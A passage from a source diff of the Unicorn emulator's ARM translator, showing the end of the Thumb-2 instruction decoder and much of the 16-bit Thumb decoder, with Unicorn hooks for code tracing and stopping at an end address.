15) { + goto illegal_op; + } + tmp = load_reg(s, rn); + tcg_gen_subi_i32(tcg_ctx, tmp, tmp, insn & 0xff); + gen_exception_return(s, tmp); + break; + case 6: /* mrs cpsr. */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (arm_dc_feature(s, ARM_FEATURE_M)) { + addr = tcg_const_i32(tcg_ctx, insn & 0xff); + gen_helper_v7m_mrs(tcg_ctx, tmp, tcg_ctx->cpu_env, addr); + tcg_temp_free_i32(tcg_ctx, addr); + } else { + gen_helper_cpsr_read(tcg_ctx, tmp, tcg_ctx->cpu_env); + } + store_reg(s, rd, tmp); + break; + case 7: /* mrs spsr. */ + /* Not accessible in user mode. */ + if (IS_USER(s) || arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + tmp = load_cpu_field(s->uc, spsr); + store_reg(s, rd, tmp); + break; + } + } + } else { + /* Conditional branch. */ + op = (insn >> 22) & 0xf; + /* Generate a conditional jump to next instruction. */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, op ^ 1, s->condlabel); + s->condjmp = 1; + + /* offset[11:1] = insn[10:0] */ + offset = (insn & 0x7ff) << 1; + /* offset[17:12] = insn[21:16]. */ + offset |= (insn & 0x003f0000) >> 4; + /* offset[31:20] = insn[26]. */ + offset |= ((int32_t)((insn << 5) & 0x80000000)) >> 11; + /* offset[18] = insn[13]. */ + offset |= (insn & (1 << 13)) << 5; + /* offset[19] = insn[11]. */ + offset |= (insn & (1 << 11)) << 8; + + /* jump to the offset */ + gen_jmp(s, s->pc + offset); + } + } else { + /* Data processing immediate. */ + if (insn & (1 << 25)) { + if (insn & (1 << 24)) { + if (insn & (1 << 20)) + goto illegal_op; + /* Bitfield/Saturate. */ + op = (insn >> 21) & 7; + imm = insn & 0x1f; + shift = ((insn >> 6) & 3) | ((insn >> 10) & 0x1c); + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + switch (op) { + case 2: /* Signed bitfield extract. */ + imm++; + if (shift + imm > 32) + goto illegal_op; + if (imm < 32) + gen_sbfx(s, tmp, shift, imm); + break; + case 6: /* Unsigned bitfield extract. */ + imm++; + if (shift + imm > 32) + goto illegal_op; + if (imm < 32) + gen_ubfx(s, tmp, shift, (1u << imm) - 1); + break; + case 3: /* Bitfield insert/clear. */ + if (imm < shift) + goto illegal_op; + imm = imm + 1 - shift; + if (imm != 32) { + tmp2 = load_reg(s, rd); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, shift, imm); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 7: + goto illegal_op; + default: /* Saturate. */ + if (shift) { + if (op & 1) + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, shift); + else + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + } + tmp2 = tcg_const_i32(tcg_ctx, imm); + if (op & 4) { + /* Unsigned. */ + if ((op & 1) && shift == 0) + gen_helper_usat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_usat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + /* Signed. */ + if ((op & 1) && shift == 0) + gen_helper_ssat16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + else + gen_helper_ssat(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + } + store_reg(s, rd, tmp); + } else { + imm = ((insn & 0x04000000) >> 15) + | ((insn & 0x7000) >> 4) | (insn & 0xff); + if (insn & (1 << 22)) { + /* 16-bit immediate. */ + imm |= (insn >> 4) & 0xf000; + if (insn & (1 << 23)) { + /* movt */ + tmp = load_reg(s, rd); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, imm << 16); + } else { + /* movw */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, imm); + } + } else { + /* Add/sub 12-bit immediate. */ + if (rn == 15) { + offset = s->pc & ~(uint32_t)3; + if (insn & (1 << 23)) + offset -= imm; + else + offset += imm; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, offset); + } else { + tmp = load_reg(s, rn); + if (insn & (1 << 23)) + tcg_gen_subi_i32(tcg_ctx, tmp, tmp, imm); + else + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, imm); + } + } + store_reg(s, rd, tmp); + } + } else { + int shifter_out = 0; + /* modified 12-bit immediate. */ + shift = ((insn & 0x04000000) >> 23) | ((insn & 0x7000) >> 12); + imm = (insn & 0xff); + switch (shift) { + case 0: /* XY */ + /* Nothing to do. */ + break; + case 1: /* 00XY00XY */ + imm |= imm << 16; + break; + case 2: /* XY00XY00 */ + imm |= imm << 16; + imm <<= 8; + break; + case 3: /* XYXYXYXY */ + imm |= imm << 16; + imm |= imm << 8; + break; + default: /* Rotated constant. */ + shift = (shift << 1) | (imm >> 7); + imm |= 0x80; + imm = imm << (32 - shift); + shifter_out = 1; + break; + } + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, imm); + rn = (insn >> 16) & 0xf; + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + op = (insn >> 21) & 0xf; + if (gen_thumb2_data_op(s, op, (insn & (1 << 20)) != 0, + shifter_out, tmp, tmp2)) + goto illegal_op; + tcg_temp_free_i32(tcg_ctx, tmp2); + rd = (insn >> 8) & 0xf; + if (rd != 15) { + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + } + } + break; + case 12: /* Load/store single data item. */ + { + int postinc = 0; + int writeback = 0; + int memidx; + if ((insn & 0x01100000) == 0x01000000) { + if (disas_neon_ls_insn(s, insn)) { + goto illegal_op; + } + break; + } + op = ((insn >> 21) & 3) | ((insn >> 22) & 4); + if (rs == 15) { + if (!(insn & (1 << 20))) { + goto illegal_op; + } + if (op != 2) { + /* Byte or halfword load space with dest == r15 : memory hints. + * Catch them early so we don't emit pointless addressing code. + * This space is a mix of: + * PLD/PLDW/PLI, which we implement as NOPs (note that unlike + * the ARM encodings, PLDW space doesn't UNDEF for non-v7MP + * cores) + * unallocated hints, which must be treated as NOPs + * UNPREDICTABLE space, which we NOP or UNDEF depending on + * which is easiest for the decoding logic + * Some space which must UNDEF + */ + int op1 = (insn >> 23) & 3; + int op2 = (insn >> 6) & 0x3f; + if (op & 2) { + goto illegal_op; + } + if (rn == 15) { + /* UNPREDICTABLE, unallocated hint or + * PLD/PLDW/PLI (literal) + */ + return 0; + } + if (op1 & 1) { + return 0; /* PLD/PLDW/PLI or unallocated hint */ + } + if ((op2 == 0) || ((op2 & 0x3c) == 0x30)) { + return 0; /* PLD/PLDW/PLI or unallocated hint */ + } + /* UNDEF space, or an UNPREDICTABLE */ + return 1; + } + } + memidx = get_mem_index(s); + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + /* PC relative. */ + /* s->pc has already been incremented by 4. */ + imm = s->pc & 0xfffffffc; + if (insn & (1 << 23)) + imm += insn & 0xfff; + else + imm -= insn & 0xfff; + tcg_gen_movi_i32(tcg_ctx, addr, imm); + } else { + addr = load_reg(s, rn); + if (insn & (1 << 23)) { + /* Positive offset. */ + imm = insn & 0xfff; + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + } else { + imm = insn & 0xff; + switch ((insn >> 8) & 0xf) { + case 0x0: /* Shifted Register. */ + shift = (insn >> 4) & 0xf; + if (shift > 3) { + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + tmp = load_reg(s, rm); + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, shift); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 0xc: /* Negative offset. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-imm); + break; + case 0xe: /* User privilege. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + memidx = MMU_USER_IDX; + break; + case 0x9: /* Post-decrement. */ + imm = 0-imm; + /* Fall through. */ + case 0xb: /* Post-increment. */ + postinc = 1; + writeback = 1; + break; + case 0xd: /* Pre-decrement. */ + imm = 0-imm; + /* Fall through. */ + case 0xf: /* Pre-increment. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + writeback = 1; + break; + default: + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + } + } + if (insn & (1 << 20)) { + /* Load. */ + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op) { + case 0: + gen_aa32_ld8u(s, tmp, addr, memidx); + break; + case 4: + gen_aa32_ld8s(s, tmp, addr, memidx); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, memidx); + break; + case 5: + gen_aa32_ld16s(s, tmp, addr, memidx); + break; + case 2: + gen_aa32_ld32u(s, tmp, addr, memidx); + break; + default: + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + if (rs == 15) { + gen_bx(s, tmp); + } else { + store_reg(s, rs, tmp); + } + } else { + /* Store. */ + tmp = load_reg(s, rs); + switch (op) { + case 0: + gen_aa32_st8(s, tmp, addr, memidx); + break; + case 1: + gen_aa32_st16(s, tmp, addr, memidx); + break; + case 2: + gen_aa32_st32(s, tmp, addr, memidx); + break; + default: + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + goto illegal_op; + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (postinc) + tcg_gen_addi_i32(tcg_ctx, addr, addr, imm); + if (writeback) { + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + break; + default: + goto illegal_op; + } + return 0; +illegal_op: + return 1; +} + +static void disas_thumb_insn(CPUARMState *env, DisasContext *s) // qq +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val, insn, op, rm, rn, rd, shift, cond; + int32_t offset; + int i; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i32 addr; + + // Unicorn: end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate WFI instruction to halt emulation + s->is_jmp = DISAS_WFI; + return; + } + + if (s->condexec_mask) { + cond = s->condexec_cond; + if (cond != 0x0e) { /* Skip conditional when condition is AL. */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + } + } + + insn = arm_lduw_code(env, s->pc, s->bswap_code); + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc)) { + // determine instruction size (Thumb/Thumb2) + switch(insn & 0xf800) { + // Thumb2: 32-bit + case 0xe800: + case 0xf000: + case 0xf800: + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc); + break; + // Thumb: 16-bit + default: + gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, s->uc, s->pc); + break; + } + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + s->pc += 2; + + switch (insn >> 12) { + case 0: case 1: + + rd = insn & 7; + op = (insn >> 11) & 3; + if (op == 3) { + /* add/subtract */ + rn = (insn >> 3) & 7; + tmp = load_reg(s, rn); + if (insn & (1 << 10)) { + /* immediate */ + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, (insn >> 6) & 7); + } else { + /* reg */ + rm = (insn >> 6) & 7; + tmp2 = load_reg(s, rm); + } + if (insn & (1 << 9)) { + if (s->condexec_mask) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + } else { + if (s->condexec_mask) + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_add_CC(s, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else { + /* shift immediate */ + rm = (insn >> 3) & 7; + shift = (insn >> 6) & 0x1f; + tmp = load_reg(s, rm); + gen_arm_shift_im(s, tmp, op, shift, s->condexec_mask == 0); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + } + break; + case 2: case 3: + /* arithmetic large immediate */ + op = (insn >> 11) & 3; + rd = (insn >> 8) & 0x7; + if (op == 0) { /* mov */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, insn & 0xff); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + store_reg(s, rd, tmp); + } else { + tmp = load_reg(s, rd); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, insn & 0xff); + switch (op) { + case 1: /* cmp */ + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 2: /* add */ + if (s->condexec_mask) + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_add_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 3: /* sub */ + if (s->condexec_mask) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + } + } + break; + case 4: + if (insn & (1 << 11)) { + rd = (insn >> 8) & 7; + /* load pc-relative. Bit 1 of PC is ignored. */ + val = s->pc + 2 + ((insn & 0xff) * 4); + val &= ~(uint32_t)2; + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, val); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, addr); + store_reg(s, rd, tmp); + break; + } + if (insn & (1 << 10)) { + /* data processing extended or blx */ + rd = (insn & 7) | ((insn >> 4) & 8); + rm = (insn >> 3) & 0xf; + op = (insn >> 8) & 3; + switch (op) { + case 0: /* add */ + tmp = load_reg(s, rd); + tmp2 = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 1: /* cmp */ + tmp = load_reg(s, rd); + tmp2 = load_reg(s, rm); + gen_sub_CC(s, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 2: /* mov/cpy */ + tmp = load_reg(s, rm); + store_reg(s, rd, tmp); + break; + case 3:/* branch [and link] exchange thumb register */ + tmp = load_reg(s, rm); + if (insn & (1 << 7)) { + ARCH(5); + val = (uint32_t)s->pc | 1; + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, val); + store_reg(s, 14, tmp2); + } + /* already thumb, no need to check */ + gen_bx(s, tmp); + break; + } + break; + } + + /* data processing register */ + rd = insn & 7; + rm = (insn >> 3) & 7; + op = (insn >> 6) & 0xf; + if (op == 2 || op == 3 || op == 4 || op == 7) { + /* the shift/rotate ops want the operands backwards */ + val = rm; + rm = rd; + rd = val; + val = 1; + } else { + val = 0; + } + + if (op == 9) { /* neg */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else if (op != 0xf) { /* mvn doesn't read its first operand */ + tmp = load_reg(s, rd); + } else { + TCGV_UNUSED_I32(tmp); + } + + tmp2 = load_reg(s, rm); + switch (op) { + case 0x0: /* and */ + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0x1: /* eor */ + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0x2: /* lsl */ + if (s->condexec_mask) { + gen_shl(s, tmp2, tmp2, tmp); + } else { + gen_helper_shl_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x3: /* lsr */ + if (s->condexec_mask) { + gen_shr(s, tmp2, tmp2, tmp); + } else { + gen_helper_shr_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x4: /* asr */ + if (s->condexec_mask) { + gen_sar(s, tmp2, tmp2, tmp); + } else { + gen_helper_sar_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x5: /* adc */ + if (s->condexec_mask) { + gen_adc(s, tmp, tmp2); + } else { + gen_adc_CC(s, tmp, tmp, tmp2); + } + break; + case 0x6: /* sbc */ + if (s->condexec_mask) { + gen_sub_carry(s, tmp, tmp, tmp2); + } else { + gen_sbc_CC(s, tmp, tmp, tmp2); + } + break; + case 0x7: /* ror */ + if (s->condexec_mask) { + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x1f); + tcg_gen_rotr_i32(tcg_ctx, tmp2, tmp2, tmp); + } else { + gen_helper_ror_cc(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp); + gen_logic_CC(s, tmp2); + } + break; + case 0x8: /* tst */ + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + gen_logic_CC(s, tmp); + rd = 16; + break; + case 0x9: /* neg */ + if (s->condexec_mask) + tcg_gen_neg_i32(tcg_ctx, tmp, tmp2); + else + gen_sub_CC(s, tmp, tmp, tmp2); + break; + case 0xa: /* cmp */ + gen_sub_CC(s, tmp, tmp, tmp2); + rd = 16; + break; + case 0xb: /* cmn */ + gen_add_CC(s, tmp, tmp, tmp2); + rd = 16; + break; + case 0xc: /* orr */ + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xd: /* mul */ + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xe: /* bic */ + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp); + break; + case 0xf: /* mvn */ + tcg_gen_not_i32(tcg_ctx, tmp2, tmp2); + if (!s->condexec_mask) + gen_logic_CC(s, tmp2); + val = 1; + rm = rd; + break; + } + if (rd != 16) { + if (val) { + store_reg(s, rm, tmp2); + if (op != 0xf) + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rd, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + + case 5: + /* load/store register offset. */ + rd = insn & 7; + rn = (insn >> 3) & 7; + rm = (insn >> 6) & 7; + op = (insn >> 9) & 7; + addr = load_reg(s, rn); + tmp = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + + if (op < 3) { /* store */ + tmp = load_reg(s, rd); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + } + + switch (op) { + case 0: /* str */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* strh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* strb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 3: /* ldrsb */ + gen_aa32_ld8s(s, tmp, addr, get_mem_index(s)); + break; + case 4: /* ldr */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + case 5: /* ldrh */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 6: /* ldrb */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 7: /* ldrsh */ + gen_aa32_ld16s(s, tmp, addr, get_mem_index(s)); + break; + } + if (op >= 3) { /* load */ + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 6: + /* load/store word immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 4) & 0x7c; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 7: + /* load/store byte immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 6) & 0x1f; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 8: + /* load/store halfword immediate offset */ + rd = insn & 7; + rn = (insn >> 3) & 7; + addr = load_reg(s, rn); + val = (insn >> 5) & 0x3e; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 9: + /* load/store from stack */ + rd = (insn >> 8) & 7; + addr = load_reg(s, 13); + val = (insn & 0xff) * 4; + tcg_gen_addi_i32(tcg_ctx, addr, addr, val); + + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* store */ + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + break; + + case 10: + /* add to high reg */ + rd = (insn >> 8) & 7; + if (insn & (1 << 11)) { + /* SP */ + tmp = load_reg(s, 13); + } else { + /* PC. bit 1 is ignored. */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, (s->pc + 2) & ~(uint32_t)2); + } + val = (insn & 0xff) * 4; + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, val); + store_reg(s, rd, tmp); + break; + + case 11: + /* misc */ + op = (insn >> 8) & 0xf; + switch (op) { + case 0: + /* adjust stack pointer */ + tmp = load_reg(s, 13); + val = (insn & 0x7f) * 4; + if (insn & (1 << 7)) + val = -(int32_t)val; + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, val); + store_reg(s, 13, tmp); + break; + + case 2: /* sign/zero extend. */ + ARCH(6); + rd = insn & 7; + rm = (insn >> 3) & 7; + tmp = load_reg(s, rm); + switch ((insn >> 6) & 3) { + case 0: gen_sxth(tmp); break; + case 1: gen_sxtb(tmp); break; + case 2: gen_uxth(tmp); break; + case 3: gen_uxtb(tmp); break; + } + store_reg(s, rd, tmp); + break; + case 4: case 5: case 0xc: case 0xd: + /* push/pop */ + addr = load_reg(s, 13); + if (insn & (1 << 8)) + offset = 4; + else + offset = 0; + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) + offset += 4; + } + if ((insn & (1 << 11)) == 0) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -offset); + } + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) { + if (insn & (1 << 11)) { + /* pop */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, i, tmp); + } else { + /* push */ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + /* advance to the next address. */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + TCGV_UNUSED_I32(tmp); + if (insn & (1 << 8)) { + if (insn & (1 << 11)) { + /* pop pc */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + /* don't set the pc until the rest of the instruction + has completed */ + } else { + /* push lr */ + tmp = load_reg(s, 14); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + if ((insn & (1 << 11)) == 0) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -offset); + } + /* write back the new stack pointer */ + store_reg(s, 13, addr); + /* set the new PC value */ + if ((insn & 0x0900) == 0x0900) { + store_reg_from_load(s, 15, tmp); + } + break; + + case 1: case 3: case 9: case 11: /* czb */ + rm = insn & 7; + tmp = load_reg(s, rm); + s->condlabel = gen_new_label(tcg_ctx); + s->condjmp = 1; + if (insn & (1 << 11)) + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, s->condlabel); + else + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, s->condlabel); + tcg_temp_free_i32(tcg_ctx, tmp); + offset = ((insn & 0xf8) >> 2) | (insn & 0x200) >> 3; + val = (uint32_t)s->pc + 2; + val += offset; + gen_jmp(s, val); + break; + + case 15: /* IT, nop-hint. */ + if ((insn & 0xf) == 0) { + gen_nop_hint(s, (insn >> 4) & 0xf); + break; + } + /* If Then. */ + s->condexec_cond = (insn >> 4) & 0xe; + s->condexec_mask = insn & 0x1f; + /* No actual code generated for this insn, just setup state. */ + break; + + case 0xe: /* bkpt */ + { + int imm8 = extract32(insn, 0, 8); + ARCH(5); + gen_exception_insn(s, 2, EXCP_BKPT, syn_aa32_bkpt(imm8, true)); + break; + } + + case 0xa: /* rev */ + ARCH(6); + rn = (insn >> 3) & 0x7; + rd = insn & 0x7; + tmp = load_reg(s, rn); + switch ((insn >> 6) & 3) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_rev16(s, tmp); break; + case 3: gen_revsh(s, tmp); break; + default: goto illegal_op; + } + store_reg(s, rd, tmp); + break; + + case 6: + switch ((insn >> 5) & 7) { + case 2: + /* setend */ + ARCH(6); + if (((insn >> 3) & 1) != s->bswap_code) { + /* Dynamic endianness switching not implemented. */ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented setend\n"); + goto illegal_op; + } + break; + case 3: + /* cps */ + ARCH(6); + if (IS_USER(s)) { + break; + } + if (arm_dc_feature(s, ARM_FEATURE_M)) { + tmp = tcg_const_i32(tcg_ctx, (insn & (1 << 4)) != 0); + /* FAULTMASK */ + if (insn & 1) { + addr = tcg_const_i32(tcg_ctx, 19); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + } + /* PRIMASK */ + if (insn & 2) { + addr = tcg_const_i32(tcg_ctx, 16); + gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); + tcg_temp_free_i32(tcg_ctx, addr); + } + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + } else { + if (insn & (1 << 4)) { + shift = CPSR_A | CPSR_I | CPSR_F; + } else { + shift = 0; + } + gen_set_psr_im(s, ((insn & 7) << 6), 0, shift); + } + break; + default: + goto undef; + } + break; + + default: + goto undef; + } + break; + + case 12: + { + /* load/store multiple */ + TCGv_i32 loaded_var; + TCGV_UNUSED_I32(loaded_var); + rn = (insn >> 8) & 0x7; + addr = load_reg(s, rn); + for (i = 0; i < 8; i++) { + if (insn & (1 << i)) { + if (insn & (1 << 11)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (i == rn) { + loaded_var = tmp; + } else { + store_reg(s, i, tmp); + } + } else { + /* store */ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + /* advance to the next address */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + if ((insn & (1 << rn)) == 0) { + /* base reg not in list: base register writeback */ + store_reg(s, rn, addr); + } else { + /* base reg in list: if load, complete it now */ + if (insn & (1 << 11)) { + store_reg(s, rn, loaded_var); + } + tcg_temp_free_i32(tcg_ctx, addr); + } + break; + } + case 13: + /* conditional branch or swi */ + cond = (insn >> 8) & 0xf; + if (cond == 0xe) + goto undef; + + if (cond == 0xf) { + /* swi */ + 